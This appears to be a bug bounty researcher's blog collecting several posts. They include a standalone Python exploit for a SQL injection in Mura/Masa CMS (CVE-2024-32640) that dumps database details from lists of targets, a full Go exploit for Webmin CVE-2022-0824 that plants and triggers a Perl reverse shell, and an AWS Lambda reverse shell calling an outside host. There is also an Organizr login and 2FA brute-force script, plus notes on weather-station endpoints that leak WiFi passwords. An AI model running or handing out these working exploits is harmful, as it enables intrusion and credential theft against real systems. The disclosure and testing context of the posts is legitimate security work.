
Mura/Masa CMS – SQL Injection CVE-2024-32640

A while back the illustrious team over at Project Discovery wrote about the discovery of an SQLi in Masa/Mura CMS. It’s a good writeup, so go check it out for the technical details.

Recently, I ran across four instances of this CMS in VDP/BB programs, and after searching around, I didn’t find much in the way of a POC that would actually dump a little info to prove exploitation. One existing POC downloaded ghauri to handle the exploitation, but I wanted something standalone.

I do this because I want to make reproduction and triage as easy as possible. I seem to have bad luck with triagers on multiple platforms lately, including one who didn’t know how to pip install a Python package and one who asked how to install Burp. Yes, you read that correctly.

Anyway, there were also some other features I always like to have, like single-URL scanning, scanning from a file, proxying, etc. So here is what I ended up with; you can also find it on my GitHub. It will test for exploitability or retrieve the current username or DB name for MySQL.

#!/usr/bin/env python3

import requests
import argparse
import time
from urllib.parse import quote
from multiprocessing.dummy import Pool
import sys 

requests.packages.urllib3.disable_warnings()

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-32640 MySQL Blind SQL Injection Proof of Concept")
    parser.add_argument('-u', '--url', dest='url', type=str, help='Input URL for single target testing')
    parser.add_argument('-f', '--file', dest='file', type=str, help='File containing a list of URLs')
    parser.add_argument('-p', '--proxy', action='store_true', help='Use a proxy (localhost:8080)')
    parser.add_argument('--dump', dest='dump', choices=['dbname', 'user'], help='Dump specific information (e.g., dbname, user)')
    args = parser.parse_args()

    global proxies
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    } if args.proxy else None

    if args.dump:
        if args.url:
            if args.dump == 'dbname':
                dump_info(args.url, 'DATABASE()', quote('DATABASE()'))
            elif args.dump == 'user':
                dump_info(args.url, 'CURRENT_USER()', quote('CURRENT_USER()'))
        elif args.file:
            with open(args.file, 'r', encoding='utf-8') as fp:
                url_list = [line.strip() for line in fp]
            mp = Pool(10)
            if args.dump == 'dbname':
                mp.map(lambda url: dump_info(url, 'DATABASE()', quote('DATABASE()')), url_list)
            elif args.dump == 'user':
                mp.map(lambda url: dump_info(url, 'CURRENT_USER()', quote('CURRENT_USER()')), url_list)
            mp.close()
            mp.join()
    elif args.url and not args.file:
        poc(args.url)
    elif args.file:
        with open(args.file, 'r', encoding='utf-8') as fp:
            url_list = [line.strip() for line in fp]
        mp = Pool(10)
        mp.map(poc, url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usage:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    """Check if the target is vulnerable using a time-based SQL injection."""
    url_payload = '/index.cfm/_api/json/v1/default/?method=processAsyncObject'
    full_url = target + url_payload
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Cache-Control": "no-cache",
        "Referer": full_url
    }

    detection_payload = "x%5C%27+AND+%28SELECT+3504+FROM+%28SELECT%28SLEEP%285%29%29%29MQYa%29--+pizzapower"

    data = f"object=displayregion&contenthistid={detection_payload}&previewid=1"

    session = requests.Session()
    start_time = time.time()
    response = session.post(full_url, headers=headers, data=data, proxies=proxies, verify=False)
    elapsed_time = time.time() - start_time

    if elapsed_time >= 5:
        print(f'[+] The target {target} is vulnerable to SQL injection.')
        with open('result.txt', 'a') as f:
            f.write(target + '\n')
    else:
        print(f'[-] The target {target} does not appear to be vulnerable.')

def dump_info(target, readable_function, encoded_function):
    """Extract specified information (e.g., database name, user) using time-based blind SQL injection for MySQL."""
    url_payload = '/index.cfm/_api/json/v1/default/?method=processAsyncObject'
    full_url = target + url_payload
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Cache-Control": "no-cache",
        "Referer": full_url
    }

    extracted_info = ""
    print(f"Extracting {readable_function} for {target}...")

    session = requests.Session()

    for i in range(1, 33):  # Assuming max length is 32 characters
        low, high = 32, 126 
        while low <= high:
            mid = (low + high) // 2
            full_sleep_time = 3
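            # SLEEP(full_sleep_time - IF(char > mid, 0, 1)): the response takes the full
            # full_sleep_time seconds when the character's ordinal is greater than mid,
            # and one second less otherwise, which drives the binary search below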
            payload = (f"x%5C%27%27+AND+%28SELECT+6666+FROM+%28SELECT%28SLEEP%28{full_sleep_time}-%28IF%28ORD%28MID%28%28IFNULL%28CAST%28{encoded_function}+AS+NCHAR%29%2C0x20%29%29%2C{i}%2C1%29%29%3E{mid}%2C0%2C1%29%29%29%29%29KLkb%29--+pizzapower")
            data = f"object=displayregion&contenthistid={payload}&previewid=1"

            start_time = time.time()
            session.post(full_url, headers=headers, data=data, proxies=proxies, verify=False)
            elapsed_time = time.time() - start_time
            if elapsed_time >= full_sleep_time:
                low = mid + 1 
            else:
                high = mid - 1 

        if high >= 32:
            extracted_info += chr(high + 1)
            print(f"Extracted so far for {readable_function}: {extracted_info}")
        else:
            break 

    if extracted_info:
        print(f"{readable_function} extracted: {extracted_info}")
        with open(f'{readable_function.lower()}_result.txt', 'a') as f:
            f.write(f'{target}: {extracted_info}\n')
    else:
        print(f"Failed to extract {readable_function} for {target}. Ensure the database type is MySQL.")

if __name__ == '__main__':
    main()

But wait! If you’re in a real big hurry, just run this SQLMap command to dump the current user 🤣

sqlmap -u "https://example.com/index.cfm/_api/json/v1/default/?method=processAsyncObject" \
       --data "object=displayregion&contenthistid=x%5C'*--+Arrv&previewid=1" \
       --level 3 --risk 2 --method POST \
       --technique=T \
       --timeout=5 \
       --dbms=mysql \
       --current-user \
       --batch

Bug Bounty VPS Box Part 2

Yes, you need a bug bounty VPS. Why, you may ask? Well, here is a list of reasons.

Bypassing Bans

The truth of the matter is that you’ll likely get banned from sites, or even whole IP blocks, for malicious scanning and/or excessive scanning (i.e. scanning too quickly). Sure, you can likely hack away just fine on a single site manually with Burp from the comfort of your personal computer. But if you’re firing up a scanner, you better think twice. Use a VPS.

Callbacks

Sure, there are a lot of tools out there for long-term callbacks, like interactsh or bxss, but in the short term it may be easier to just use a server you’re already SSH’d into. You got a blind XSS and you want to load a payload from your server to show impact? Just tail your web server logs.
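If you don’t want to configure a full web server for that, a few lines of Python on the VPS will serve your payload and print every request that hits it. This is just a minimal sketch – the port is arbitrary and you’d serve whatever payload file your injection references:

#!/usr/bin/env python3
# Minimal callback catcher: serves files from the current directory and logs
# every request, handy for spotting a blind XSS fetching your hosted payload.
import http.server
import socketserver

PORT = 8000  # arbitrary port for this sketch

class LoggingHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, fmt, *args):
        # include the caller's IP and the request line in each log entry
        print(f"[callback] {self.client_address[0]} {fmt % args}")

with socketserver.TCPServer(("", PORT), LoggingHandler) as httpd:
    httpd.serve_forever()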

I’ve even gone so far as to deploy my own private Burp Collaborator instance, as detailed here – https://portswigger.net/burp/documentation/collaborator/server/private

POCs

If you’re behind NAT on your home network, it’s gonna be hard for anything to connect back to your listener if you somehow get an RCE on a target network.

Or maybe you have a CORS bug or postMessage XSS and you need to host a POC somewhere. Sure, you could forward ports from your router and fiddle around all day, but trust me, it’s way easier to just fire up a $5/month box on Linode and let it run 24/7.

Vertical and Horizontal Scaling Your Bug Bounty VPS Setup

Despite what a lot of people may tell you, essentially all of the leading bug bounty hunters do some sort of mass scanning. Now, with that said, they all do it to a different degree.

Automation is especially essential if you plan on making bug bounty hunting a source of passive, steady, and significant income. But you can’t do all of that without scaling. You need to scan more things faster which requires larger instances and greater numbers of them. Eventually your lowly desktop PC cannot handle all of this work.

For this you’d want to use axiom, or similar tooling.

Experience

This is underrated. Whether you’re an IT professional with a ‘real’ job or a beginning bug bounty hunter, experience with cloud providers is invaluable. Deploying a server on AWS, Azure, or Linode (my choice for bug hunting) builds exactly that experience.

So?

Yes, you need a bug bounty VPS. Just use one. They’re cheap. You can even use this link and get a $100 credit at Linode, so it’s essentially free for a while too, haha.

Department of Defense Researcher of the Month

I was recently awarded the DoD Researcher of the Month for July 2023. Between moving across the country and other hacking duties, I still had time to hammer away at a particular subdomain and found a bunch of stuff, including a file upload RCE via a null-byte-truncated file extension that was present in multiple locations. Along with that I had some XSS, SQLi, and an auth bypass, I think. I’m gonna try to repeat for August, since I’m on a roll, despite it only being a VDP and not a bug bounty program. I have some good reports in, and a couple in the works, but I don’t know if they’ll be enough to win, lol. Hopefully I’ll get back to some bounty programs after August.

SQL Injection in Eufy Security Application

I found a textbook SQLi in the Eufy Security application.

Don’t mind the heavy use of red blocks for redaction. First, the normal request. Everything looks fine. Notice the response time of 35 milliseconds.

a normal request as seen in Burp

The second request with a 10 second sleep payload. Notice the response time in the bottom right corner.

I was able to dump some info to confirm this was actually real.
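Since everything identifying is redacted here, the sketch below is only a generic illustration of the timing check used to confirm a time-based SQLi like this one – the URL, parameter, and payload are placeholders, not the actual Eufy endpoint:

import time
import requests

# Placeholder target and payloads -- not the real (redacted) Eufy endpoint.
URL = "https://target.example/api/items"
BASELINE = {"id": "1"}
SLEEPER = {"id": "1' AND SLEEP(10)-- -"}

def timed(params):
    start = time.time()
    requests.get(URL, params=params, timeout=30)
    return time.time() - start

print(f"baseline:      {timed(BASELINE):.2f}s")
print(f"sleep payload: {timed(SLEEPER):.2f}s")  # roughly 10s slower suggests injection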

It’s been reported and confirmed by Eufy.

Self-Hosted Security Part ? – Poor Rate Limiting in Organizr

Organizr is a self-hosted application written in PHP that basically helps you self-host other services at your home. It’s a nifty application with a surprisingly large amount of functionality. I was recently poking at it to find some security holes, and the first thing I ran across was a rate-limiting issue on the login function.

When making a POST request to log in, there is a body parameter called loginAttempts. If your login fails, the value of this parameter is incremented (via client-side JS) and included in the next login request. When the value reaches a certain number, which is checked in PHP on the backend, the user is locked out.

You can probably see where this is going. Just send the request to Burp Intruder and never increment the value. Tada!

POST request to login showing the loginAttempts parameter in the request body
loginAttempts is set to 1 and the request is sent to Burp Intruder for brute forcing

The PHP backend will always see the value of loginAttempts as 1, and brute forcing is allowed to occur.
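Outside of Burp, the same idea only takes a few lines of Python. This is a rough sketch – the host, login path, and success check below are placeholders and may differ between Organizr versions:

import requests

# Placeholder host and login path -- adjust for the target Organizr install.
LOGIN_URL = "https://organizr.example/api/login"
USERNAME = "admin"

with open("passwords.txt") as fh:
    for password in (line.strip() for line in fh):
        data = {
            "username": USERNAME,
            "password": password,
            "loginAttempts": 1,  # never incremented, so the backend never locks us out
        }
        resp = requests.post(LOGIN_URL, data=data, verify=False)
        # success detection is a placeholder -- tune it to the actual response
        if "error" not in resp.text.lower():
            print(f"[+] possible hit: {USERNAME}:{password}")
            break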

The same endpoint and method is used to rate-limit 2FA code entry, which allows an attacker to also brute force a 2FA code. This takes a bit of time – I haven’t done the math – but it still works. An attacker can just sit back and fire away with Burp Intruder. A successful login will generate cookies that will work for their specified amount of time.

Burp screenshot showing the response when a successful 2FA code is submitted

This issue has been reported on https://huntr.dev.

Webmin CVE-2022-0824 RCE in Golang

I’ve continued my quest to translate exploits into Golang. Here is an RCE in Webmin due to broken access controls. Please see the following links for more information.

https://nvd.nist.gov/vuln/detail/CVE-2022-0824

https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

https://www.webmin.com/security.html

You can also find this code on my GitHub.

package main

import (
	"bytes"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"regexp"
	"runtime"
	"strings"
)

func check(e error) {
	if e != nil {
		fmt.Println(e)
	}
}

func makePayload(callbackIP string, callbackPort string) {
	payload := []byte("perl -e 'use Socket;$i=\"" + callbackIP + "\";$p=" + callbackPort + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\")};'")
	err := os.WriteFile("./commands.cgi", payload, 0644)
	check(err)

	return
}

func login(client http.Client, target string, creds string) string {

	loginURL := target + "/session_login.cgi"

	params := "user=" + strings.Split(creds, ":")[0] + "&pass=" + strings.Split(creds, ":")[1]

	request, err := http.NewRequest("POST", loginURL, bytes.NewBufferString(params))
	if err != nil {
		log.Fatal(err)
	}

	request.Header.Set("Cookie", "redirect=1; testing=1")
	request.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	var sidCookie = ""

	resp, err := client.Do(request)
	if err != nil {
		log.Fatalln(err)
	} else {

		sidCookie = resp.Request.Response.Cookies()[0].Value
	}
	resp.Body.Close()
	// now use sid cookie to make sure it works to log in
	request, err = http.NewRequest("GET", target, nil)
	request.Header.Set("Cookie", "redirect=1; testing=1; sid="+sidCookie)

	resp, err = client.Do(request)
	if err != nil {
		log.Fatalln(err)
	}
	bodyBytes, err := io.ReadAll(resp.Body)
	bodyString := string(bodyBytes)
	resp.Body.Close()
	r, _ := regexp.Compile("System hostname")
	if !r.MatchString(bodyString) {
		fmt.Println("----> Unable to obtain sid cookie. Check your credentials.")
		return ""
	}

	return sidCookie
}

func runServer(serverURL string) {
	fmt.Println("--> Running a server on " + serverURL)
	serverPort := strings.Split(serverURL, ":")[1]

	exec.Command("setsid",
		"/usr/bin/python3",
		"-m",
		"http.server",
		serverPort,
		"0>&1 &").Output()

	fmt.Println("--> Server Started!")

	return
}

func downloadURL(client http.Client, target string, serverURL string, creds string, sid string) {

	URL := target + "/extensions/file-manager/http_download.cgi?module=filemin"

	serverIP := strings.Split(serverURL, ":")[0]
	serverPort := strings.Split(serverURL, ":")[1]

	bodyString := "link=http://" + serverIP + "/" + serverPort + "/commands.cgi&username=&password=&path=/usr/share/webmin"

	request, err := http.NewRequest("POST", URL, bytes.NewBufferString(bodyString))

	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func modifyPermissions(client http.Client, target string, serverURL string, creds string, sid string) {
	modifyURL := target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"

	bodyString := "name=commands.cgi&perms=0755&applyto=1&path=/usr/share/webmin"

	request, err := http.NewRequest("POST", modifyURL, bytes.NewBufferString(bodyString))

	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func execShell(client http.Client, target string, sid string) {
	fileLocation := target + "/commands.cgi"

	fmt.Println("--> Triggering shell. Check listener!")

	request, err := http.NewRequest("GET", fileLocation, nil)
	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func stopServer(serverURL string) {
	serverPort := strings.Split(serverURL, ":")[1]
	// run through a shell so the $(lsof ...) command substitution actually executes
	out, _ := exec.Command("bash", "-c", "kill -9 $(lsof -t -i:"+serverPort+")").Output()
	fmt.Println("--> Killed Server!")
	fmt.Println(string(out))

	return
}

func main() {
	fmt.Println("--> Running Exploit! Ensure listener is running!")
	if runtime.GOOS == "windows" {
		fmt.Println("Can't Execute this on a windows machine")
		return
	}

	target := flag.String("t", "https://www.webmin.local:10000", "Target full URL, https://www.webmin.local:10000")
	creds := flag.String("c", "username:password", "Format, username:password")
	serverURL := flag.String("sl", "192.168.8.120:8787", " Http server for serving payload, ex 192.168.8.120:8080")
	callbackIP := flag.String("s", "127.0.0.1", " Callback IP to receive revshell")
	callbackPort := flag.String("p", "9999", " Callback port to receive revshell")

	flag.Parse()

	// uncomment the following to use a local proxy
	// proxyUrl, err := url.Parse("http://localhost:8080")
	// check(err)

	// tr := &http.Transport{
	// 	TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11,
	// 		MaxVersion: tls.VersionTLS11},
	// 	Proxy: http.ProxyURL(proxyUrl),
	// }
	// client := &http.Client{Transport: tr}

	// comment out these two lines if using the proxy above.
	tr := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11, MaxVersion: tls.VersionTLS12}}
	client := &http.Client{Transport: tr}

	makePayload(*callbackIP, *callbackPort)
	sid := login(*client, *target, *creds)
	runServer(*serverURL)
	downloadURL(*client, *target, *serverURL, *creds, sid)
	modifyPermissions(*client, *target, *serverURL, *creds, sid)
	execShell(*client, *target, sid)
	stopServer(*serverURL)
}

A Quick AWS Lambda Reverse Shell

Let’s say you’re doing a pentest and you run across access to AWS Lambda. I recently learned you can get a persistent shell (for 15 minutes, at least) via Lambda, which seemed odd to me because I always just considered Lambda a repeatable but ephemeral thing.

Anyway, first create lambda_function.py with the following code. Note that you’ll need a hostname to connect to. In my case, I used pizzapower.me.

Lambda reverse shell python code.
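The code from the screenshot isn’t reproduced here, but a minimal handler along these lines does the job – the callback host and port are placeholders for your own listener:

# lambda_function.py -- minimal reverse shell for a Python 3.9 Lambda runtime.
# HOST and PORT are placeholders for your own listener.
import os
import socket
import subprocess

HOST = "attacker.example.com"
PORT = 4444

def lambda_handler(event, context):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    # wire the socket to stdin/stdout/stderr, then hand over to an interactive shell
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/sh", "-i"])
    return {"statusCode": 200}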

Next, zip this up into shell.zip.

Creating shell.zip that contains our reverse shell function.

Now we are going to create a Lambda function and upload our shell.zip with the following command

aws lambda create-function --function-name test --runtime python3.9 --handler lambda_function.lambda_handler --timeout 900 --zip-file fileb://shell.zip --role <The Amazon Resource Name (ARN) of the function's execution role>
Creating our function and uploading the code.

Don’t forget to start your listener, and when you are ready, trigger the function!
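You can trigger it from the console or the CLI; if you’re scripting it, a boto3 invoke works too (this assumes your AWS credentials are already configured and that you used the function name from the command above):

import boto3

# assumes credentials are configured and the function was created as "test" above
client = boto3.client("lambda")
client.invoke(FunctionName="test", InvocationType="Event")  # async, returns immediately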

And catch the shell.

According to the docs, “a Lambda function always runs inside a VPC owned by the Lambda service.” But you can attach your function to your own VPC, so depending on how the victim’s AWS environment is configured, you may be able to pivot around and exploit some more stuff.

The Incredibly Insecure Weather Station – Part 2

Edit: The weather station issues were given CVE-2022-35122.

I contacted the manufacturer in regards to these issues. They responded quickly. I wasn’t expecting anything to be done about the issues that I brought up, but they did do something…

I logged into my weather station yesterday, and lo and behold, there is an update. Most notable is the following: “added password encryption for HTTP transmission.”

Screenshot from the app itself showing the update notes.

Encryption for the password during HTTP transmission? What does this even mean? HTTPS? Why wouldn’t they just say HTTPS? Just encrypting the password client side and sending it to the station for decryption? That seems odd. I was hoping for HTTPS, but I would soon be let down.

curl request from before and after the ‘upgrade’

Before updating, I decided to try and make the curl request as I had done before to the get_device_info endpoint. As before, the password to the system was returned.

Next, I upgraded the device and then made the same request. Would you look at that, the APpwd now does look ‘encrypted.’ But, as you may have guessed, it is actually just base64 encoded.

V2VhdGhlcjI0Njg5 –> Weather24689

base64 decoding

Or, using jq, you can do this all on the CLI.
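The same check is only a couple of lines of Python, too – the station’s LAN address below is a placeholder for whatever IP yours has:

import base64
import requests

# Placeholder LAN address for the weather station.
resp = requests.get("http://192.168.1.50/get_device_info", timeout=5)
encoded = resp.json().get("APpwd", "")
print(base64.b64decode(encoded).decode())  # V2VhdGhlcjI0Njg5 -> Weather24689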

I think this is a losing battle.

The Incredibly Insecure Weather Station

Edit: This was given CVE-2022-35122.

I recently purchased the ECOWITT GW1102 Home Weather Station. It’s exactly what it sounds like – a mini weather station for your house. It has all the usual sensors you’d expect a weather station to have, and I’m actually very pleased with the hardware, considering the cheap price.

However, it is missing one thing – software security. But really, what did I expect from a cheap home weather station?

Comically, the landing page of the weather station’s server gives an illusion of some sort of security.

Password goes here.

Let’s intercept a request of us logging in.

Don’t steal my password.

This is all over HTTP. We POST our password to /set_login_info – which seems like an odd endpoint for logging in. Notice that the response does not set any cookies or appear to do any sort of verification. Hmmm.

Anyway, after logging in, we are directed to /liveData.html. This page does exactly what its name implies. But let’s look at the links on the side of the page – particularly the Local Network link.

Click the Local Network link on the left-hand side.

If we intercept the requests in Burp after we click the Local Network link, we see a call to a /get_network_info endpoint. This returns info about the WiFi network to which the weather station is connected.

That’s my WiFi SSID and password.

Interesting. Notice again that there appears to be no authentication going on with this request. Let’s try to curl this endpoint.

Uh oh.
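For reference, the unauthenticated request from the screenshot is trivial to reproduce – the station’s LAN address below is a placeholder:

import requests

# Placeholder LAN address; note that no credentials or cookies are sent.
resp = requests.get("http://192.168.1.50/get_network_info", timeout=5)
print(resp.text)  # returns the WiFi SSID and password in the clear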

Or how about the device password (not that you actually need the password now).

The password is now Weather24689 because I changed it without being authorized.

You can also do fun things like reboot the station, or get the user’s external weather reporting site’s API keys, etc. I notified ECOWITT support, but I’m assuming this won’t be fixed any time soon.

Edit: added this because someone didn’t understand this is an issue.

Edit: I added the picture above of the get_ws_settings endpoint. As you can see, I’m not using any authentication. You can also see I was trying some shenanigans, but nonetheless, the response returns several API keys for other services, which is not a good thing to be handing out. It is basically the API endpoint backing the page that sits behind the application’s ‘authentication.’

I did find some of these exposed to the internet, but I’d probably avoid that, if I were you. With that said, I actually like the hardware. It’s fun to play around with, and it is inexpensive.

Deploying and Configuring a Bug Bounty Box with Terraform and Ansible

Prerequisites and Getting Started

I sometimes like to spin up a virtual machine in the cloud, do some testing, and then tear it down. It doesn’t even have to be for bug bounty hunting, but since I’ve been hunting so sporadically lately, that’s what I’ve been using this project for.

Anyway, it becomes tedious to do this repeatedly, so I decided to automate a large majority of the infrastructure creation and configuration with Terraform and Ansible.

In the following article, I’ll deploy a node on Linode, my VPS provider of choice. Use this referral link for a $100, 60-day credit. That way, you can test this project out until you’re blue in the face. The node size I deploy in this post runs $10 a month.

While Terraform and Ansible can accomplish many of the same things, they each have their wheelhouse: Terraform should be used for deploying infrastructure, and Ansible should be used to configure that infrastructure.

In order to follow along with this article, you’ll need to install Terraform and Ansible per your operating system’s documentation. I’m using Ubuntu 20.10.

Let’s begin by creating a directory structure for your project.

mkdir -p ./bugbounty/{terraform/templates,ansible}

Next, you’ll need to obtain credentials from Linode. If you haven’t already, create an account, then click on your account name in the top, right-hand corner and select “API Tokens.”

Select create an access token and give it a name. Select Linodes and Read/Write, and then click “Create Token.”

Linode Read/Write Access Token

The token will be a long string of characters. Save this token for usage in a bit!

Terraform

cd into the Terraform directory you just created and create the following files:

$ touch {main.tf,output.tf,variables.tf,variables.tfvars}

The main.tf file is where the magic is done. This file will create the VM to our specifications. The variables.tf file declares variables that are used in main.tf. variables.tfvars will have the initializing values for these variables. You can also initialize the variables directly in variables.tf or even on the command line, if you’d prefer. We do it this way because it makes updating variables slightly easier and our project simpler, in a sense. output.tf defines what values will be printed to the console after we run the project.

Next, create some templates within the templates directory.

touch {./templates/ansible.tmpl,./templates/playbook.tmpl,./templates/hosts}

main.tf

Copy the following code into main.tf:

terraform {
  required_providers {
    linode = {
      source  = "linode/linode"
      version = "1.27.0"
    }
  }
}

# Configure the Linode Provider
provider "linode" {
  token = var.token
}

# Create a Linode
resource "linode_instance" "bugbountybox" {
  image     = var.image
  label     = var.label
  region    = var.region
  type      = var.type
  root_pass = var.root_pass
}

# Create an Ansible playbook from a template file
resource "local_file" "bugbountybox_setup" {
  content = templatefile("./templates/playbook.tmpl",
    {
      ip_address = linode_instance.bugbountybox.ip_address
    }
  )
  file_permission = "0640"
  filename        = "../ansible/playbook.yml"
}

# Create an Ansible config from a template file. 
resource "local_file" "ansible_config" {
  content = templatefile("./templates/ansible.tmpl",
    {
      remote_user = "root"
    }
  )
  file_permission = "0640"
  filename        = "../ansible/ansible.cfg"
}

# Create an Ansible inventory (hosts) file containing the new VM's IP
resource "local_file" "ansible_inventory" {
  content         = linode_instance.bugbountybox.ip_address
  file_permission = "0640"
  filename        = "../ansible/hosts"
}

variables.tf

Copy the following code into variables.tf:

variable "token" {
  type        = string
  description = "Linode APIv4 token."
  sensitive   = true
}

variable "image" {
  type        = string
  description = "Image to use for your VM."
  default     = "linode/ubuntu20.04"
}

variable "label" {
  type        = string
  description = "Label to give your VM."
}

variable "region" {
  type        = string
  description = "Region where the VM will be created."
}

variable "root_pass" {
  type        = string
  description = "Password for the root account on this VM."
  sensitive   = true
}

variable "type" {
  description = "Your Linode's plan type."
  # You can initialize variables here instead of the tfvars file. 
  default = "g6-standard-1"
}

variables.tfvars

Copy the following code into variables.tfvars, and enter the values as needed:

token     = "" # put your API token here. 
image     = "linode/ubuntu20.04"
label     = "bug-bounty-box"
region    = "us-east"
root_pass = "" # put your new VM's password here. 
output.tf

Copy the following code into output.tf:

output "IP_Address" {
  value = linode_instance.bugbountybox.ip_address
}

Templates

The templates will be used by Terraform to create files that Ansible will use. We could manually create/edit these Ansible files, but why do things manually when we can automate it?

Copy the following code into ansible.tmpl:

[defaults]
host_key_checking = False
remote_user = ${ remote_user }
ask_pass      = True

Copy the following code into playbook.tmpl:

---
- name: Update/upgrade and install packages on remote server.
  hosts: ${ ip_address }
  become: true
  tasks:
    - name: Update
      apt: update_cache=yes force_apt_get=yes cache_valid_time=3600

    - name: Upgrade all packages on servers
      apt: upgrade=dist force_apt_get=yes

    - name: Install packages
      apt:
        pkg:
          - ca-certificates
          - curl
          - apt-transport-https
          - lsb-release
          - gnupg
          - software-properties-common
          - python3-pip
          - unzip
          - tar
          - tmux
          - gobuster
          - wireguard
          - wireguard-tools
          - john
          - hashcat
          - nikto
          - ruby-full
          - ruby-railties
          - hydra
          - cewl
          - whois
          - squid
          - nmap
          - git
          - python3-impacket

        update_cache: true

    - name: Install Golang
      shell: |
        wget https://go.dev/dl/go1.18.linux-amd64.tar.gz
        tar -xvf go1.18.linux-amd64.tar.gz
        chown -R root:root ./go
        mv go /usr/local
        echo "export GOPATH=$HOME/go" >> $HOME/.bashrc
        echo "export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin" >> $HOME/.bashrc
      args:
        executable: /bin/bash

    - name: Install Amass
      shell: |
        curl -s https://api.github.com/repos/OWASP/Amass/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip amass* 
        chmod +x ./amass_linux_amd64/amass 
        mv ./amass_linux_amd64/amass /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Nuclei
      shell: |
        curl -s https://api.github.com/repos/projectdiscovery/nuclei/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip nuclei* nuclei
        chmod +x nuclei
        mv nuclei /usr/bin/
      args:
        executable: /bin/bash

    - name: Install FFUF
      shell: |
        curl -s https://api.github.com/repos/ffuf/ffuf/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
        tar xzf ffuf* ffuf
        chmod +x ffuf
        mv ffuf /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Subfinder
      shell: |
        curl -s https://api.github.com/repos/projectdiscovery/subfinder/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip subfinder* subfinder
        chmod +x subfinder
        mv subfinder /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Aquatone
      shell: |
        curl -s https://api.github.com/repos/michenriksen/aquatone/releases/latest | grep "browser_download_url.*linux_amd64-*" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip aquatone* aquatone
        chmod +x aquatone 
        mv aquatone /usr/bin
      args:
        executable: /bin/bash

    - name: Install getallurls (gau)
      shell: |
        curl -s https://api.github.com/repos/lc/gau/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
        tar xzf gau* gau 
        chmod +x gau 
        mv gau /usr/bin
      args:
        executable: /bin/bash

    - name: Install CrackMapExec
      shell: |
        wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.2.2/cme-ubuntu-latest.zip
        unzip cme-ubuntu-latest.zip -d "$HOME/tools/"
        pip3 install cffi==1.14.5
      args:
        executable: /bin/bash

    - name: Reboot the box
      reboot:
        msg: "Reboot initiated by Ansible for updates"
        connect_timeout: 5
        reboot_timeout: 300
        pre_reboot_delay: 0
        post_reboot_delay: 30
        test_command: uptime

If you take a close look at these templates, you’ll see variables indicated with the following templating syntax:

${ variable_name }

These are “filled in” during the terraform apply process. We only have a single variable in each of these files, but you can use as many as you’d like depending on what you’re trying to accomplish. This is a very powerful feature. It allows you to dynamically create files to be used in other processes – in our case, Ansible.

It’s Alive!

We are ready to create our infrastructure by running the following commands within the terraform directory. Type “yes” when prompted after the apply command.

$ terraform init

$ terraform fmt

$ terraform validate

$ terraform apply -var-file="./variables.tfvars"

The terraform init command initializes the project directory. terraform fmt formats the files to the canonical style. terraform validate validates the project to ensure it will work properly. Finally, terraform apply creates your infrastructure using the tfvars file you specified.

If everything goes as planned, you should see output similar to this.

terraform apply output

As you can see, the IP address of our VM is present in the output, as we specified in output.tf.

Ansible

During the infrastructure creation process, several files should have been created in the ansible directory. Ansible will use these files to update/upgrade and install packages on our VM. From the ansible directory, we run the following command to configure our new VM. At the start, you will be prompted for the SSH password, which is the root password you set in your tfvars file.

$ ansible-playbook -i hosts playbook.yml

We need to specify the hosts file that Terraform created so Ansible doesn’t use the hosts file located in /etc/ansible.

This process will take a few minutes to complete, but if all went as planned, you should see something similar to this on your terminal.

Tear it Down

When you are all done playing around with your new VM, you can destroy it with the following command. Please remember to destroy it or else you will incur costs. Type “yes” when prompted.

$ terraform destroy -var-file="./variables.tfvars"

What’s Next?

Now, play around with the above project. Can you set it up to deploy multiple VMs? Can you set it up to deploy multiple VMs, install some other packages, run some commands and send the output of those commands to a database somewhere? Can you set this up on multiple clouds?

The example here is pretty basic, and doesn’t necessarily follow best practices (especially with Ansible), but it gives you the idea of what can be done with automation. Some, if not all, of the leading bug bounty hunters are at least partially automating their work. You should automate too.

Feel free to download all this code from my GitHub, and don’t forget to use my link to sign up for a Linode account.

Links

